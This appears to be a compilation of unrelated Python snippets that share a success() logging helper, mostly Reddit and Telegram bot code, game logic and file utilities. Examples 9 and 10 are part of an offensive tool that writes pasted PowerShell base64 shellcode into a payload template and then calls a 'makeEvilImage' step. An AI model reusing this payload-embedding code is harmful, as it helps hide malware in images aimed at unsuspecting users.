def load_data():
    global banned_users
    global badsubs
    global root_only_subs
    global totalposted
    global imgur_client_id
    global banned_users_comment
    global badsubs_comment
    global root_only_subs_comment
    global totalposted_comment
    imgur_client_id = datafile_lines[2].strip()
    banned_users_comment = "t1_" + datafile_lines[3].strip()
    badsubs_comment = "t1_" + datafile_lines[4].strip()
    root_only_subs_comment = "t1_" + datafile_lines[5].strip()
    totalposted_comment = "t1_" + datafile_lines[6].strip()
    try:
        banned_users = r.get_info(thing_id=banned_users_comment).body.split()
        badsubs = r.get_info(thing_id=badsubs_comment).body.split()
        root_only_subs = r.get_info(
            thing_id=root_only_subs_comment).body.split()
        totalposted = int(float(r.get_info(thing_id=totalposted_comment).body))
        success("DATA LOADED")
    except Exception as e:
        traceback.print_exc()
        fail("DATA LOAD FAILED: %s" % e)
        exit()
def load_data():
  global banned_users
  global badsubs
  global already_done
  global totalposted
  global imgur_client_id
  global USERNAME
  global PASSWORD
  try:
    banned_users = [line.strip() for line in open('banned_users')]
    badsubs = [line.strip() for line in open('badsubs')]
    already_done = [line.strip() for line in open('already_done_dump')]
    with open('totalposted') as f:
      totalposted = pickle.load(f)
    with open ('imgur_client_id', 'r') as myfile:
      imgur_client_id=myfile.read()
    with open ('userpass', 'r') as myfile:
      userpass_lines=myfile.readlines()
      USERNAME = userpass_lines[0].strip()
      PASSWORD = userpass_lines[1].strip()
    success("DATA LOADED")
  except:
    traceback.print_exc()
    file_warning()
    exit()
def load_data():
  global banned_users
  global badsubs
  global root_only_subs
  global totalposted
  global imgur_client_id
  global banned_users_comment
  global badsubs_comment
  global root_only_subs_comment
  global totalposted_comment
  imgur_client_id = datafile_lines[2].strip()
  banned_users_comment = "t1_"+datafile_lines[3].strip()
  badsubs_comment = "t1_"+datafile_lines[4].strip()
  root_only_subs_comment = "t1_"+datafile_lines[5].strip()
  totalposted_comment = "t1_"+datafile_lines[6].strip()
  try:
    banned_users = r.get_info(thing_id=banned_users_comment).body.split()
    badsubs = r.get_info(thing_id=badsubs_comment).body.split()
    root_only_subs = r.get_info(thing_id=root_only_subs_comment).body.split()
    totalposted = int(float(r.get_info(thing_id=totalposted_comment).body))
    success("DATA LOADED")
  except Exception as e:
    traceback.print_exc()
    fail("DATA LOAD FAILED: %s"%e)
    exit()
def load_data():
  global banned_users
  global badsubs #banned subs?
  global root_only_subs
  global summon_only_subs
  global imgur_client_id
  global banned_users_page
  global badsubs_page
  global root_only_subs_page
  global summon_only_subs_page
  imgur_client_id = datafile_lines[2].strip()

  #load wiki pages for lists of users and sub settings
  #TODO change sub name
  banned_users_page = r.get_wiki_page('autowikibot','userblacklist')
  badsubs_page = r.get_wiki_page('autowikibot','excludedsubs')
  root_only_subs_page = r.get_wiki_page('autowikibot','rootonlysubs')
  summon_only_subs_page = r.get_wiki_page('autowikibot','summononlysubs')

  #extract info from sub wiki pages
  try:
    banned_users = banned_users_page.content_md.strip().split()
    badsubs = badsubs_page.content_md.strip().split()
    root_only_subs = root_only_subs_page.content_md.strip().split()
    summon_only_subs = summon_only_subs_page.content_md.strip().split()
    success("DATA LOADED")
  except Exception as e:
    #traceback.print_exc()
    fail("DATA LOAD FAILED: %s"%e)
    exit()
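
The wiki-based load_data above reads each list from a subreddit wiki page, and the save_changing_variables snippet further down writes the lists back with r.edit_wiki_page, so the bot's state survives restarts without local files. Below is a minimal sketch of that round trip, assuming the same PRAW 2.x-style calls used in these snippets (get_wiki_page, content_md, edit_wiki_page) and an already logged-in session r; the helper names and the 'excludedsubs' page are illustrative only.

def load_excluded_subs(r, subreddit='autowikibot'):
    # one entry per whitespace-separated token, exactly as the snippets split it
    page = r.get_wiki_page(subreddit, 'excludedsubs')
    return page.content_md.strip().split()

def save_excluded_subs(r, subs, editsummary, subreddit='autowikibot'):
    # de-duplicate and store one indented name per line, mirroring save_changing_variables
    body = ''.join('    ' + s + '\n' for s in sorted(set(subs), reverse=True))
    r.edit_wiki_page(subreddit, 'excludedsubs', body, editsummary)
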
def post_reply(reply,post):
  global badsubs
  global submissioncount
  global totalposted
  try:
    #TODO change name
    #possibly remove? not gonna be nsfw
    reply = "#####	\n\n######	\n\n####	\n"+reply+"^Parent ^commenter ^can [^toggle ^NSFW](/message/compose?to=autowikibot&subject=AutoWikibot NSFW toggle&message=%2Btoggle-nsfw+____id____) ^or[](#or) [^delete](/message/compose?to=autowikibot&subject=AutoWikibot Deletion&message=%2Bdelete+____id____)^. ^Will ^also ^delete ^on ^comment ^score ^of ^-1 ^or ^less. ^| [^(FAQs)](http://www.np.reddit.com/r/autowikibot/wiki/index) ^| [^Mods](http://www.np.reddit.com/r/autowikibot/comments/1x013o/for_moderators_switches_commands_and_css/) ^| [^Magic ^Words](http://www.np.reddit.com/r/autowikibot/comments/1ux484/ask_wikibot/)"
    a = post.reply('[#placeholder-awb]Comment is being processed... It will be automatically replaced by new text within a minute or will be deleted if that fails.')
    postsuccess = r.get_info(thing_id='t1_'+str(a.id)).edit(reply.replace('____id____',str(a.id)))
    if not postsuccess:
      raise Exception ('reply unsuccessful')
    totalposted = totalposted + 1
    submissioncount[str(post.submission.id)]+=1
    success("[OK] #%s "%totalposted)
    return True
  except Exception as e:
    warn("REPLY FAILED: %s @ %s"%(e,post.subreddit))
    if str(e).find('TOO_LONG') > -1:
      a.delete()
    elif str(e) == '403 Client Error: Forbidden' and str(post.subreddit) not in badsubs:
      badsubs = badsubs_page.content_md.strip().split()
      badsubs.append(str(post.subreddit))
      editsummary = 'added '+str(post.subreddit)
      save_changing_variables(editsummary)
    else:
      fail(e)
      a.delete()
    return False
def save_changing_variables(editsummary):
  ##Save badsubs
  global badsubs
  badsubs = list(set(badsubs))
  badsubs.sort(reverse=True)
  c_badsubs = ""
  for item in badsubs:
    c_badsubs = "    "+item+'\n'+c_badsubs
  #TODO change sub name
  r.edit_wiki_page('autowikibot','excludedsubs',c_badsubs,editsummary)
  ##Save root_only_subs
  global root_only_subs
  root_only_subs = list(set(root_only_subs))
  root_only_subs.sort(reverse=True)
  c_root_only_subs = ""
  for item in root_only_subs:
    c_root_only_subs = "    "+item+'\n'+c_root_only_subs
  #TODO change sub name
  r.edit_wiki_page('autowikibot','rootonlysubs',c_root_only_subs,editsummary)
  ##Save summon_only_subs
  global summon_only_subs
  summon_only_subs = list(set(summon_only_subs))
  summon_only_subs.sort(reverse=True)
  c_summon_only_subs = ""
  for item in summon_only_subs:
    c_summon_only_subs = "    "+item+'\n'+c_summon_only_subs
  #TODO change sub name
  r.edit_wiki_page('autowikibot','summononlysubs',c_summon_only_subs,editsummary)
  
  
  success("DATA SAVED")
def load_data():
  global banned_users
  global badsubs
  global root_only_subs
  global summon_only_subs
  global imgur_client_id
  global banned_users_page
  global badsubs_page
  global root_only_subs_page
  global summon_only_subs_page
  imgur_client_id = datafile_lines[2].strip()
  banned_users_page = r.get_wiki_page('autowikiabot','userblacklist')
  badsubs_page = r.get_wiki_page('autowikiabot','excludedsubs')
  root_only_subs_page = r.get_wiki_page('autowikiabot','rootonlysubs')
  summon_only_subs_page = r.get_wiki_page('autowikiabot','summononlysubs')
  try:
    banned_users = banned_users_page.content_md.strip().split()
    badsubs = badsubs_page.content_md.strip().split()
    root_only_subs = root_only_subs_page.content_md.strip().split()
    summon_only_subs = summon_only_subs_page.content_md.strip().split()
    success("DATA LOADED")
  except Exception as e:
    #traceback.print_exc()
    fail("DATA LOAD FAILED: %s"%e)
    exit()
def post_reply(reply,post):
  global badsubs
  global submissioncount
  global totalposted
  # This is a quick hack to fix the double list issue (git issue #12)
  # Please find the actual source of this bug, and delete this hack
  # It removes any sentences that are posted more than once
  lines = []
  for line in reply.split("\n"):
    if line not in lines:
      lines.append(line)
  reply = '\n'.join(lines)
  try:
    reply = "#####	\n\n######	\n\n####	\n"+reply+"\n^Parent ^commenter ^can [^toggle ^NSFW](http://www.np.reddit.com/message/compose?to=autowikiabot&subject=AutoWikibot NSFW toggle&message=%2Btoggle-nsfw+____id____) ^or[](#or) [^delete](http://www.np.reddit.com/message/compose?to=autowikiabot&subject=AutoWikibot Deletion&message=%2Bdelete+____id____)^. ^Will ^also ^delete ^on ^comment ^score ^of ^-1 ^or ^less. ^| [^(FAQs)](http://www.np.reddit.com/r/autowikiabot/wiki/index) ^|  [^Source](https://github.com/Timidger/autowikiabot-py)\n ^(Please note this bot is in testing. Any help would be greatly appreciated, even if it is just a bug report! Please checkout the) [^source ^code](https://github.com/Timidger/autowikiabot-py) ^(to submit bugs)"
    a = post.reply('[#placeholder-awb]Comment is being processed... It will be automatically replaced by new text within a minute or will be deleted if that fails.')
    postsuccess = r.get_info(thing_id='t1_'+str(a.id)).edit(reply.replace('____id____',str(a.id)))
    if not postsuccess:
      raise Exception ('reply unsuccessful')
    totalposted = totalposted + 1
    submissioncount[str(post.submission.id)]+=1
    success("[OK] #%s "%totalposted)
    return True
  except Exception as e:
    warn("REPLY FAILED: %s @ %s"%(e,post.subreddit))
    if str(e) == '(TOO_LONG) `this is too long (max: 15000.0)` on field `text`':
      a.delete()
    elif str(e) == '403 Client Error: Forbidden' and str(post.subreddit) not in badsubs:
      badsubs = badsubs_page.content_md.strip().split()
      badsubs.append(str(post.subreddit))
      editsummary = 'added '+str(post.subreddit)
      save_changing_variables(editsummary)
    else:
      fail(e)
      a.delete()
    return False
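
Both post_reply variants above depend on a placeholder-then-edit trick: the bot cannot know a comment's id before posting it, so it first posts a short placeholder, takes the id reddit assigns, and then edits that comment so the ____id____ tokens in the delete/NSFW links point back at the comment itself. The sketch below strips the flow down to its essentials, reusing the same PRAW 2.x calls (reply, get_info, edit) that appear in the snippets; template is assumed to be any reply body containing ____id____.

def post_with_self_id(r, post, template):
    # 1. post a placeholder so reddit assigns the comment an id
    placeholder = post.reply('[#placeholder-awb] Comment is being processed...')
    comment_id = str(placeholder.id)
    # 2. substitute the comment's own id into its links, then edit it in place
    body = template.replace('____id____', comment_id)
    return r.get_info(thing_id='t1_' + comment_id).edit(body)
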
Example 9
def writeShellcode(sc):
    info("Reading Template...")
    with open('./res/payload.ps1', 'r') as p:
        payload = p.read().replace('\n', '')
    payload = payload.replace('<encoded>', sc)
    with open('./tmp/payload.ps1', 'w') as f:
        f.write(payload)
    success("Wrote Temp Payload!")
Example 10
def requirementsCheck(img):
    info("Checking Requirements")
    if not os.path.isdir('./tmp'):
        warning("tmp dir does not exist")
        os.makedirs('./tmp')
        success("Created tmp dir")
    sc = input("[?] Paste your Powershell base64 shellcode:")
    writeShellcode(sc)
    makeEvilImage(img)
Example 11
def initialize_new_config():
    CURRENT_DIR = os.getcwd()
    USER_HOME = os.environ.get('HOME', None)

    CONFIG_DIR = None

    if not USER_HOME:
        error('ERROR: User home directory not found')
        exit(-1)
    elif CURRENT_DIR != USER_HOME:
        # If current directory is not home ask where to initialize
        log('The current directory is not the user\'s home directory')
        log('It is recommended to store the dotfiles directory in the home directory'
            )
        try:
            if prompt_yn(
                    'Would you like to choose switch to the home directory?'):
                CONFIG_DIR = f'{USER_HOME}/{DOTFILES}'
            else:
                CONFIG_DIR = f'{CURRENT_DIR}/{DOTFILES}'
        except Exception:
            error('Invalid choice! exiting...')
            exit(-1)
    else:
        # Already in the home directory, so initialize there
        CONFIG_DIR = f'{USER_HOME}/{DOTFILES}'

    print(f'Creating dotfiles repository at {CONFIG_DIR}')
    try:
        os.mkdir(CONFIG_DIR)
    except FileExistsError:
        warning('Given location already exists!')
        try:
            if not prompt_yn(
                    'Initialize at the location anyways? (WARNING: This might cause LOSS OF DATA)',
                    default='N'):
                exit(-1)
        except Exception:
            error('Invalid choice exiting...')
            exit(-1)

    os.chdir(CONFIG_DIR)

    # Initialize a git repository in the configuration directory
    git_process = Popen(['git', 'init'], stdout=PIPE, stderr=PIPE)

    if git_process.wait() != 0:
        error('Error initializing git repository')
        exit(-1)

    # Create an initial configuration file
    config_file = open('configuration.yaml', 'w')

    config_file.write(yaml.dump(default_config))

    config_file.close()

    success('Dotfiles directory initialized successfully')

    return CONFIG_DIR
def post_reply(reply,post):
  global totalposted
  try:
    post.reply(reply)
    totalposted = totalposted + 1
    success("#%s REPLY SUCCESSFUL"%totalposted)
    return True
  except Exception as e:
    warn("REPLY FAILED: %s @ %s"%(e,post.subreddit))
    if str(e) == '403 Client Error: Forbidden':
      badsubs.append(str(post.subreddit))
    return False
def save_changing_variables():
    badsubs.sort()
    c_badsubs = ""
    for item in badsubs:
        c_badsubs = item + "\n" + c_badsubs
    c_badsubs = c_badsubs.strip()
    r.get_info(thing_id=badsubs_comment).edit(c_badsubs)
    time.sleep(1)

    r.get_info(thing_id=totalposted_comment).edit(str(totalposted))
    time.sleep(1)

    success("DATA SAVED")
Example 14
 def removePage(self, pageName):
     if db.fetch('pages', 'page', pageName) == None:
         return success("Page {} wasn't monitored".format(
             pageName))  # it is anyway a success
     db.delete('pages', 'page', pageName)
     self.deadPages.append(pageName)
     if pageName in self.alivePages:
         self.alivePages.remove(pageName)
     else:
         logger.error(
             'There was an error, {} was not in alivePages. It is a bug'.
             format(pageName))
     return success('Page {} removed'.format(pageName))
def login(USERNAME,PASSWORD):
  Trying = True
  while Trying:
    try:
      r.login(USERNAME, PASSWORD)
      success("LOGGED IN")
      Trying = False
    except praw.errors.InvalidUserPass:
      fail("WRONG USERNAME OR PASSWORD")
      exit()
    except Exception as e:
      fail("%s"%e)
      time.sleep(5)
def save_changing_variables():
  badsubs.sort()
  c_badsubs = ""
  for item in badsubs:
    c_badsubs = item+"\n"+c_badsubs
  c_badsubs = c_badsubs.strip()
  r.get_info(thing_id=badsubs_comment).edit(c_badsubs)
  time.sleep(1)

  r.get_info(thing_id=totalposted_comment).edit(str(totalposted))
  time.sleep(1)

  success("DATA SAVED")
Example 17
def download_subdirectory(subdir_name, options):
    """
    Downloads and extracts only a certain subdirectory
    Works by downloading the whole repo and taking just the folder
    that we need.
    """

    util.print_msg("info", "Preparing to download the subdirectory %s" % subdir_name)
    TMPDIR_NAME = "grabrc.subdir.tmpd"
    TMPDIR_PATH = os.path.join(options.destdir, TMPDIR_NAME)
    TARGET_PATH = os.path.join(options.destdir, options.outfile or subdir_name)
    logging.debug("Subdirectory tmpdir: %s" % TMPDIR_PATH)
    logging.debug("Subdirectory target: %s" % TARGET_PATH)

    util.info("Creating temporary directory paths...")

    if options.append:
        util.warn("Append option doesn't apply to directories. \
        Falling to default behavior of backing up \
        the existing directory")

    target_exists = os.path.exists(TARGET_PATH)
    if target_exists:
        if options.replace:
            util.info("Replacing the existing directory %s" % TARGET_PATH)
            shutil.rmtree(TARGET_PATH)
        else:
            util.warn("Found an existing directory %s" % TARGET_PATH)
            util.warn("Backing up existing directory %s to %s%s" %
                      (TARGET_PATH, TARGET_PATH, Const.BACKUP_SUFFIX))
            util.backup_file(TARGET_PATH)

    # Try to download the repository then move it to the current directory
    # _create_grabrc_folder will check if the directory already exists
    try:
        # Download the repository and move the subdirectory
        _create_grabrc_folder(options.github,
                              options.destdir,
                              TMPDIR_NAME)
        #os.makedirs(TMPDIR_PATH)  # Create the tmpdir again
        # We still use subdir_name, the original name
        if not os.path.exists(os.path.join(TMPDIR_PATH, subdir_name)):
            util.exit_runtime_error("Couldn't find the subdirectory %s in the repository" % subdir_name)

        shutil.move(os.path.join(TMPDIR_PATH, subdir_name), TARGET_PATH)
    finally:
        # Clean up after ourselves
        util.info("Cleaning up temporary directories...")
        shutil.rmtree(TMPDIR_PATH)

    util.success("Downloaded subdirectory %s to %s" % (subdir_name, TARGET_PATH))
Example 18
def SearchSubredditTitlesForKeywords(subredditName, keyWords):

	already_done = []

	#Starting with a single subreddit.  This may later be changed to look at all comments 
	subreddit = r.get_subreddit(subredditName)
	for submission in subreddit.get_hot(limit=10):
		op_text = submission.selftext.encode('ascii', 'ignore').lower()		
		has_keyWords = any(string in op_text for string in keyWords)
		# Test if it contains a PRAW-related question
		if submission.id not in already_done and has_keyWords:
			msg = '[Keyword found](%s)' % submission.short_link
			success(msg)
			already_done.append(submission.id)
def save_changing_variables():
  banned_users.sort()
  with open('banned_users', 'w+') as myfile:
    for item in banned_users:
      myfile.write("%s\n" % item)
  badsubs.sort()
  with open('badsubs', 'w+') as myfile:
    for item in badsubs:
      myfile.write("%s\n" % item)
  with open('already_done_dump', 'w+') as myfile:
    for item in already_done:
      myfile.write("%s\n" % item)
  with open('totalposted', 'w') as f:#TODO replace pickle with simple write
    pickle.dump(totalposted, f)
  success("DATA SAVED")
Example 20
def download_images(
        component_descriptor: ComponentDescriptor,
        upload_registry_prefix: str,
        image_reference_filter,
        parallel_jobs=8,  # eight is a good number
):
    '''
    downloads all matching container images, discarding the retrieved contents afterwards.
    While this may seem pointless, this actually does serve a purpose. Namely, we use the
    vulnerability scanning service offered by GCR. However, said scanning service will only
    continue to run (and thus update vulnerability reports) for images that keep being
    retrieved occasionally (relevant timeout being roughly 4w).
    '''
    image_refs = [
        ci.image_reference()
        for _, ci in product.util._enumerate_effective_images(
            component_descriptor=component_descriptor,
            image_reference_filter=image_reference_filter,
        )
    ]

    # XXX deduplicate this again (copied from product/scanning.py)
    def upload_image_ref(image_reference):
        image_name, tag = image_reference.rsplit(':', 1)
        mangled_reference = ':'.join((image_name.replace('.', '_'), tag))
        return urljoin(upload_registry_prefix, mangled_reference)

    image_refs = [upload_image_ref(ref) for ref in image_refs]

    info(
        f'downloading {len(image_refs)} container images to simulate consumption'
    )

    executor = ThreadPoolExecutor(max_workers=parallel_jobs)

    def retrieve_image(image_reference: str):
        try:
            container.registry.retrieve_container_image(
                image_reference=image_reference)
            info(f'downloaded {image_reference}')
        except Exception:
            warning(f'failed to retrieve {image_reference}')
            import traceback
            traceback.print_exc()

    # force generator to be exhausted
    tuple(executor.map(retrieve_image, image_refs))
    success(f'successfully retrieved {len(image_refs)} container images')
    def finish(self):
        # set last update
        self.channel.last_update = datetime.date.today()
        self._save_channel()

        new_bots = Bot.select_new_bots()
        if not self.silent and len(new_bots) > 0:
            self.notify_admin("Sending notifications to subscribers...")
            subscribers = Notifications.select().where(Notifications.enabled == True)
            notification_count = 0
            for sub in subscribers:
                try:
                    util.send_md_message(self.bot, sub.chat_id,
                                         messages.BOTLIST_UPDATE_NOTIFICATION.format(
                                             n_bots=len(new_bots),
                                             new_bots=Bot.get_new_bots_markdown()))
                    notification_count += 1
                    sub.last_notification = datetime.date.today()
                    sub.save()
                except TelegramError:
                    pass
            self.sent['notifications'] = "Notifications sent to {} users.".format(
                notification_count)

        changes_made = len(self.sent) > 1 or len(self.sent['category']) > 0
        if changes_made:
            text = util.success('{}{}'.format('BotList updated successfully:\n\n',
                                              mdformat.results_list(self.sent)))
        else:
            text = mdformat.none_action("No changes were necessary.")

        log.info(self.sent)
        self.bot.formatter.send_or_edit(self.chat_id, text, to_edit=self.message_id)
Example 22
def notify_bot_spam(bot, update, args=None):
    tg_user = update.message.from_user
    user = User.from_telegram_object(tg_user)
    if util.stop_banned(update, user):
        return
    reply_to = util.original_reply_id(update)

    if args:
        text = ' '.join(args)
    else:
        text = update.message.text
        command_no_args = len(
            re.findall(r'^/spam\s*$',
                       text)) > 0 or text.lower().strip() == '/spam@botlistbot'
        if command_no_args:
            update.message.reply_text(util.action_hint(
                "Please use this command with an argument. For example:\n/spam @mybot"
            ),
                                      reply_to_message_id=reply_to)
            return

    # `#spam` is already checked by handler
    try:
        username = re.match(settings.REGEX_BOT_IN_TEXT, text).groups()[0]
        if username == '@' + settings.SELF_BOT_NAME:
            log.info("Ignoring {}".format(text))
            return
    except AttributeError:
        if args:
            update.message.reply_text(util.failure(
                "Sorry, but you didn't send me a bot `@username`."),
                                      quote=True,
                                      parse_mode=ParseMode.MARKDOWN,
                                      reply_to_message_id=reply_to)
        else:
            log.info("Ignoring {}".format(text))
            # no bot username, ignore update
            pass
        return

    try:
        spam_bot = Bot.get(
            fn.lower(Bot.username)**username.lower(), Bot.approved == True)
        try:
            Suggestion.get(action="spam", subject=spam_bot)
        except Suggestion.DoesNotExist:
            suggestion = Suggestion(user=user,
                                    action="spam",
                                    date=datetime.date.today(),
                                    subject=spam_bot)
            suggestion.save()
        update.message.reply_text(util.success(
            "Thank you! We will review your suggestion and mark the bot as spammy."
        ),
                                  reply_to_message_id=reply_to)
    except Bot.DoesNotExist:
        update.message.reply_text(
            util.action_hint("The bot you sent me is not in the @BotList."),
            reply_to_message_id=reply_to)
    return ConversationHandler.END
Example 23
def req_list() -> dict:
    """
    Query the list of player applications.
    """
    page: int = int(request.args["page"])
    page_size: int = int(
        request.args["pageSize"] if request.args["pageSize"] else "10")

    count: int = db.session.query(func.count(ApplyPlayer.id)).scalar()
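    # clamp the requested page to the valid range, e.g. count=95, page_size=10 gives pages 1..10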
    page: int = max(1, min(page, math.ceil(count / page_size)))

    keyword = request.args["keyword"]
    status = request.args["status"]
    query = db.session.query(ApplyPlayer)
    if keyword:
        keyword = '%' + keyword + '%'  # no SQL injection risk here
        query = query.filter(
            or_(ApplyPlayer.player_name.like(keyword),
                ApplyPlayer.ip.like(keyword), ApplyPlayer.qq.like(keyword)))
    if status:
        query = query.filter_by(status=ApplyStatus.__members__[status])
    apply_players: list = query\
        .order_by(ApplyPlayer.req_time.desc()) \
        .limit(page_size) \
        .offset((page - 1) * page_size) \
        .all()

    for player in apply_players:
        player.password = None

    return success(pager_data(page, count, apply_players, page_size))
Example 24
def manage_subscription(bot, update):
    chat_id = update.effective_chat.id
    user_id = update.effective_user.id

    if util.is_group_message(update):
        admins = bot.get_chat_administrators(chat_id)
        if user_id not in [admin.user.id for admin in admins]:
            bot.formatter.send_failure(
                chat_id,
                "Sorry, but only Administrators of this group are allowed "
                "to manage subscriptions.")
            return

    text = "Would you like to be notified when new bots arrive at the @BotList?"
    buttons = [[
        InlineKeyboardButton(util.success("Yes"),
                             callback_data=util.callback_for_action(
                                 CallbackActions.SET_NOTIFICATIONS,
                                 {'value': True})),
        InlineKeyboardButton("No",
                             callback_data=util.callback_for_action(
                                 CallbackActions.SET_NOTIFICATIONS,
                                 {'value': False}))
    ]]
    reply_markup = InlineKeyboardMarkup(buttons)
    msg = util.send_md_message(bot, chat_id, text, reply_markup=reply_markup)
    return ConversationHandler.END
Example 25
 def get_qos_detail(self):
     req = requests.get(self.endpoint_url + "/api/misystem/qos_info")
     if (req.status_code == 200):
         return success(message="QoS info retrieved!", data=req.json())
     return fail(
         message="There was an error while getting the QoS details...",
         data=req.content)
Example 26
def get_by(key, value):
    device = db.devices.find_one({key: value}, {'details': {"$slice": -10}})
    if (device):
        del device["_id"]
        return util.success("Entity found", device)
    else:
        return util.fail("Entity not found")
Example 27
    def _systeminfo_eventit(self, agent, data, systeminfo_url):
        """Send if event failed/okay event as appropriate."""

        notification = self.server.notifications.get("systeminfo")

        if success(data):
            if notification.color == 'red':
                adata = agent.todict()
                if 'info' in data:
                    adata['info'] = data['info']
                if self.system[SystemKeys.STATUS_SYSTEMINFO_SEND_ALERTS]:
                    self.event.gen(EventControl.SYSTEMINFO_OKAY, adata)
                notification.modification_time = func.now()
                notification.color = 'green'
                notification.description = systeminfo_url
                meta.Session.commit()
        else:
            # Failed
            if notification.color != 'red' or \
                                notification.description != systeminfo_url:
                # If the systeminfo_url has changed, then tell them this
                # one didn't work (either).  We can potentially send
                # multiple of these events if they keep entering bad
                # URLs.
                adata = agent.todict()
                adata['error'] = data['error']
                if self.system[SystemKeys.STATUS_SYSTEMINFO_SEND_ALERTS]:
                    self.event.gen(EventControl.SYSTEMINFO_FAILED, adata)
                notification.modification_time = func.now()
                notification.color = 'red'
                notification.description = systeminfo_url
                meta.Session.commit()
Example 28
 def leave_game(self, player: Player) -> Dict[str, str]:
     '''Removes player from game and progresses game if it's that players turn'''
     current_player = self.players[self.current_player_index]
     current_stage = self.stage_index
     if len(self.players) == 1:
         self.status = "Completed"
         return util.success("Successfully ended game")
     if player == current_player:
         next_player = self.players[(self.current_player_index + 1) % len(self.players)]
         self.players = [_player for _player in self.players if _player != player]
         self.current_player_index = self.players.index(next_player)
         self.stage_index = 0
     else:
         self.players = [_player for _player in self.players if _player != player]
         self.current_player_index = self.players.index(current_player)
     return util.success("Successfully left game")
Example 29
 def deck_to_hand(self, player: Player) -> Dict[str, str]:
     '''Draws three cards from market to players hand'''
     if self.market:
         return util.error("Cannot draw cards until market is empty")
     player.hand = player.hand + self.draw_cards(3)
     self.go_next_stage()
     self.go_next_player()
     return util.success('Successfully drew three cards for hand')
def post_reply(reply, post):
    global totalposted
    try:
        reply = "#####&#009;\n\n######&#009;\n\n####&#009;\n" + reply
        post.reply(reply)
        totalposted = totalposted + 1
        success("#%s REPLY SUCCESSFUL" % totalposted)
        return True
    except praw.errors.RateLimitExceeded as error:
        warn('RL %d SEC' % error.sleep_time)
        time.sleep(error.sleep_time)
    except Exception as e:
        warn("REPLY FAILED: %s @ %s" % (e, post.subreddit))
        if str(e) == '403 Client Error: Forbidden':
            badsubs = r.get_info(thing_id=badsubs_comment).body.split()
            badsubs.append(str(post.subreddit))
            save_changing_variables()
        return False
def post_reply(reply,post):
  global totalposted
  try:
    reply = "#####&#009;\n\n######&#009;\n\n####&#009;\n"+reply
    post.reply(reply)
    totalposted = totalposted + 1
    success("#%s REPLY SUCCESSFUL"%totalposted)
    return True
  except praw.errors.RateLimitExceeded as error:
    warn('RL %d SEC' % error.sleep_time)
    time.sleep(error.sleep_time)
  except Exception as e:
    warn("REPLY FAILED: %s @ %s"%(e,post.subreddit))
    if str(e) == '403 Client Error: Forbidden':
      badsubs = r.get_info(thing_id=badsubs_comment).body.split()
      badsubs.append(str(post.subreddit))
      save_changing_variables()
    return False
Example 32
 def start_game(self, player: Player) -> Dict[str, str]:
     '''Starts game by dealing cards to players and setting status'''
     if self.status != 'Awaiting':
         return util.error('Game has already started')
     if not player.is_host:
         return util.error('Only host can start game')
     self.deal_cards()
     self.status = 'Running'
     return util.success('Successfully started game')
Example 33
def LoginToReddit():
    datafile_lines = OpenConfigFile()
    r = praw.Reddit("LearnRedditAPI - Alpha .1")
    USERNAME = datafile_lines[0].strip()
    PASSWORD = datafile_lines[1].strip()
    Trying = True
    while Trying:
        try:
            r.login(USERNAME, PASSWORD)
            success("LOGGED IN")
            Trying = False
            return r
        except praw.errors.InvalidUserPass:
            fail("WRONG USERNAME OR PASSWORD")
            exit()
        except Exception as e:
            fail("%s"%e)
            time.sleep(5)
Example 34
 def buy_field(self, player: Player):
     '''Buy third field for 3 coins'''
     if player.coins < 3:
         return util.error("Not enough coins to purchase third field")
     if player.fields[2].enabled:
         return util.error("Field already purchased")
     player.coins -= 3
     player.fields[2].enabled = True
     return util.success("Successfully purchased third field")
Example 35
 def reject_trade(self, player: Player, trade_id: str):
     trade: Trade = util.shrink([trade for trade in self.trades if trade.id == trade_id])
     if not trade:
         return util.error("Trade does not exist")
     if player is not trade.p2:
         return util.error("You are not in this trade")
     # Remove trade from trades
     self.trades = [trade for trade in self.trades if trade.id != trade_id]
     return util.success("Trade successfully rejected")
Example 36
 def create_trade(self, p1: Player, p2_name: str, card_ids: List[str], wants: List[str]):
     tcs: List[TradingCard] = self.ids_to_tcs(p1, card_ids)
     new_trades: List[Trade] = []
     p2: Player = util.shrink([player for player in self.players if player.name == p2_name])
     if not p2:
         return util.error("Player chosen is not in game")
     new_trades += [Trade(p1, p2, tcs, wants)]
     self.trades += new_trades
     return util.success('Successfully created trade')
Example 37
def _create_grabrc_folder(username, destdir, dirname):
    """
    Creates the local copy of the grabrc git repository in directory destdir
    with name dirname. The path destdir/dirname should not already exist
    """
    # Check if the repo exists
    repo_dirpath = os.path.join(destdir, dirname)
    tmp_path = os.path.join(repo_dirpath, "grabrctmp.d")

    def download_and_untar():
        """Downloads a tar from the server, untars one directory up"""
        repo_targz = _get_grabrc_archive(username, "targz")
        util.untar_gz(repo_targz)
        os.renames(glob.glob("./%s*" % (Const.REPO_NAME))[0], tmp_path)

    # Sanity check: if they have a file named with the directory (they shouldn't)
    if os.path.isfile(repo_dirpath):
        util.warn("Found a file where there should be a git directory. \
                   Backing up...")
        util.backup_file(repo_dirpath)
    elif os.path.isdir(repo_dirpath):
        util.info("Found an existing directory named %s in %s..." % (dirname, destdir))
        util.info("Backing up the directory...")
        util.backup_file(repo_dirpath)

    if not os.path.exists(repo_dirpath):
        # Make a temporary staging directory
        util.print_msg("info", "Preparing repository directory at %s" % repo_dirpath)
        os.makedirs(repo_dirpath)
        os.chdir(repo_dirpath)

        download_and_untar()

        # Move everything from the tmpdirectory to one level up
        repofiles = [os.path.join(tmp_path, filename)
                     for filename in os.listdir(tmp_path)]
        map(lambda f: shutil.move(f, repo_dirpath), repofiles)  # os.rmdir requires empty dir
        os.rmdir(tmp_path)
    else:
        util.exit_runtime_error("The repository's target directory exists at %s \
        but should have been backed up to a different location. Race condition?" % repo_dirpath)

    util.success("Finished repository download.")
Example 38
 def set_qos_status(self, status=0):
     if (status != 0 and status != 1):
         return fail('Invalid status, send 0 for disable, 1 for enable')
     req = requests.get(self.endpoint_url +
                        '/api/misystem/qos_switch?on={}'.format(status))
     if (req.status_code == 200):
         return success('QoS status changed to {}'.format(status))
     return fail(
         'There was an error while setting the status of QoS to {}'.format(
             status))
Example 39
def download_file(filename, options):
    """Downloads a file from the grabrc server"""
    FILE_URL = "%s/%s/%s" % \
        (Const.SERVER_URL, options.github, filename)

    logging.debug("FILE_URL: %s" % FILE_URL)

    contents = util.http_get_contents(FILE_URL)

    if options.stdout:
        print contents
        sys.exit(0)

    # Use options if they exist, otherwise fall to defaults
    outfile = options.outfile or filename
    destdir = options.destdir or os.getcwd()
    target_path = os.path.join(destdir, outfile)
    backup_path = target_path + Const.BACKUP_SUFFIX
    target_file_exists = os.path.isfile(target_path)

    # Handle --append, --replace, or default behavior (default is to backup a conflict)
    if not target_file_exists or options.append:
